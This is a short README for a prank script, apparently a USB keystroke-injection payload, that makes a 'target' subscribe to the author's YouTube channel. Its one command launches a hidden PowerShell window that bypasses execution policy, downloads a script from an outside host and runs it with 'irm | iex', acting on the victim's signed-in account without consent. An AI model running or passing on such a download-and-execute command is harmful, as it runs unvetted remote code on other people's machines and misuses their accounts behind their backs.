
Table of Contents
- Description
- Getting Started
- Contributing
- Version History
- Contact
- Acknowledgments
# Subscribe
A script I put together to make your target subscribe to your YouTube channel.
## Description
This script is set to open your YouTube account in their browser where they will be prompted to subscribe to you.
SPOILER: They do.
## Getting Started
### Dependencies
* Windows 10,11
* Your target will have to be signed into their YouTube account
(back to top)
### Executing program
* Plug in your device
* 15 seconds later you have a new subscriber
```
powershell -w h -NoP -Ep Bypass $channel='youtube.com/iamjakoby';irm jakoby.lol/wj4 | iex
```
(back to top)
## Contributing
All contributors names will be listed here
I am Jakoby
(back to top)
## Version History
* 0.1
* Initial Release
(back to top)
## Contact
📱 My Socials 📱
YouTube
|
Twitter
|
Instagram
|
Discord
|
TikTok
|
(back to top)
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
(back to top)